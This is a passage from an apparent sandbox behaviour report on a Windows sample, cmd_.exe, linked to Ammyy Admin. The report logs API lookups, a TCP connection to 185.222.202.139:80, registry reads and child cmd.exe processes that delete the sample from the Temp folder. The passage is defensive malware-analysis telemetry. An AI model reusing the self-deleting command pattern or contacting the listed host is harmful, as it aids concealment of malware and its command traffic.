| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7761441c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7763c50e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7763c381 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7546f088 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776205d7 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7763ca24 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x775f0b8c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x776afde8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77641e1d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x754ccd11 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x7546eee0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleEx, address_out = 0x7546c78f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandle, address_out = 0x7547cbfc |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimePreciseAsFileTime, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeConditionVariable, address_out = 0x77608456 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeConditionVariable, address_out = 0x77677de4 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeAllConditionVariable, address_out = 0x7763409d |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SleepConditionVariableCS, address_out = 0x754d4b32 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeSRWLock, address_out = 0x77608456 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = AcquireSRWLockExclusive, address_out = 0x776029f1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TryAcquireSRWLockExclusive, address_out = 0x77614892 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReleaseSRWLockExclusive, address_out = 0x776029ab |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SleepConditionVariableSRW, address_out = 0x754d4b74 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWork, address_out = 0x7546ee45 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SubmitThreadpoolWork, address_out = 0x77648491 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWork, address_out = 0x7763d8e2 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x754d46b1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x754d4751 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x754d3f49 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ProcessIdToSessionId, address_out = 0x75451275 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceFrequency, address_out = 0x754541f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75451725 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsBadCodePtr, address_out = 0x75472b34 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlGetVersion, address_out = 0x7760873a |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetNativeSystemInfo, address_out = 0x754610b5 |
|
1 |
Window (250)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = AmmyyAdminTarget3, wndproc_parameter = 0 |
|
1 | |
| Find | - | class_name = fdsfds |
|
249 |
System (2326)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = EXB9WSP |
|
1 | |
| Sleep | duration = 100 milliseconds (0.100 seconds) |
|
2314 | |
| Sleep | duration = 50 milliseconds (0.050 seconds) |
|
2 | |
| Get Time | type = System Time, time = 1627-02-02 21:37:23 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10941676 |
|
1 | |
| Get Time | type = Ticks, time = 10941878 |
|
3 | |
| Get Time | type = Ticks, time = 10941941 |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Network Behavior
TCP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 169 bytes |
| Total Data Received | 3 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 185.222.202.139:80 |
TCP Session #1
| Information | Value |
|---|---|
| Handle | 0xf0 |
| Address Family | AF_INET |
| Type | SOCK_STREAM |
| Protocol | IPPROTO_IP |
| Remote Address | 185.222.202.139 |
| Remote Port | 80 |
| Local Address | 0.0.0.0 |
| Local Port | 49167 |
| Data Sent | 169 bytes |
| Data Received | 3 bytes |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Connect | remote_address = 185.222.202.139, remote_port = 80 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 36, size_out = 36 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 131, size_out = 131 |
|
1 | |
| Send | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 |
Process #22: cmd.exe
59
0
| Information | Value |
|---|---|
| ID | #22 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /c del C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe >> NUL |
| Initial Working Directory | C:\Users\qj4SUKboE\Desktop\ |
| Monitor | Start Time: 00:01:28, Reason: Child Process |
| Unmonitor | End Time: 00:02:38, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa60 |
| Parent PID | 0x814 (c:\users\qj4suk~1\appdata\local\temp\cmd_.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | EXB9WSP\qj4SUKboE |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A70
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x000d0000 | 0x00136fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x00140fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x003affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x005bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000006f0000 | 0x006f0000 | 0x006fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00887fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x00a10fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000a20000 | 0x00a20000 | 0x01e1ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001e20000 | 0x01e20000 | 0x02162fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| cmd.exe | 0x4a7d0000 | 0x4a81bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74d90000 | 0x74debfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x74df0000 | 0x74e2efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74e50000 | 0x74e57fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winbrand.dll | 0x750d0000 | 0x750d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75120000 | 0x7512bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75130000 | 0x7518ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75290000 | 0x752d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75300000 | 0x753cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x75440000 | 0x7554ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x75900000 | 0x759abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75d10000 | 0x75e0ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75e10000 | 0x75e9ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x75ea0000 | 0x75f3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x760a0000 | 0x760a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x76dc0000 | 0x76e1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x76e20000 | 0x76e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x76f00000 | 0x76feffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x77130000 | 0x771cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000771d0000 | 0x771d0000 | 0x772c9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000772d0000 | 0x772d0000 | 0x773eefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x773f0000 | 0x77598fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x775d0000 | 0x7774ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Host Behavior
File (23)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | NUL | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Users\qj4SUKboE\Desktop | type = file_attributes |
|
2 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe | type = file_attributes |
|
2 | |
| Get Info | C:\Users\QJ4SUK~1\AppData\Local\Temp | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
9 | |
| Open | STD_INPUT_HANDLE | - |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
2 | |
| Delete | C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe | - |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4a7d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75440000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7546a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75473b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75454a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7546a79d |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-06-06 09:52:21 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10940630 |
|
1 |
Environment (9)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
3 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\qj4SUKboE\Desktop |
|
1 |
Process #23: cmd.exe
63
0
| Information | Value |
|---|---|
| ID | #23 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /c del C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe >> NUL |
| Initial Working Directory | C:\Users\qj4SUKboE\Desktop\ |
| Monitor | Start Time: 00:01:28, Reason: Child Process |
| Unmonitor | End Time: 00:02:38, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa80 |
| Parent PID | 0x814 (c:\users\qj4suk~1\appdata\local\temp\cmd_.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | EXB9WSP\qj4SUKboE |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A90
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x0019ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x005dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000760000 | 0x00760000 | 0x0085ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x009e7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000009f0000 | 0x009f0000 | 0x00b70fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000b80000 | 0x00b80000 | 0x01f7ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001f80000 | 0x01f80000 | 0x022c2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| cmd.exe | 0x4a7d0000 | 0x4a81bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74d90000 | 0x74debfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x74df0000 | 0x74e2efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74e50000 | 0x74e57fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winbrand.dll | 0x750c0000 | 0x750c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75120000 | 0x7512bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75130000 | 0x7518ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75290000 | 0x752d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75300000 | 0x753cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x75440000 | 0x7554ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x75900000 | 0x759abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75d10000 | 0x75e0ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75e10000 | 0x75e9ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x75ea0000 | 0x75f3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x760a0000 | 0x760a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x76dc0000 | 0x76e1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x76e20000 | 0x76e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x76f00000 | 0x76feffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x77130000 | 0x771cffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000771d0000 | 0x771d0000 | 0x772c9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000772d0000 | 0x772d0000 | 0x773eefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x773f0000 | 0x77598fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x775d0000 | 0x7774ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Host Behavior
File (27)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | NUL | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Users\qj4SUKboE\Desktop | type = file_attributes |
|
2 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\QJ4SUK~1\AppData\Local\Temp\cmd_.exe | type = file_attributes |
|
2 | |
| Get Info | C:\Users\QJ4SUK~1\AppData\Local\Temp | type = file_attributes |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
9 | |
| Open | STD_INPUT_HANDLE | - |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
2 | |
| Open | STD_ERROR_HANDLE | - |
|
3 | |
| Write | STD_ERROR_HANDLE | size = 62 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4a7d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75440000 |
|
2 | |
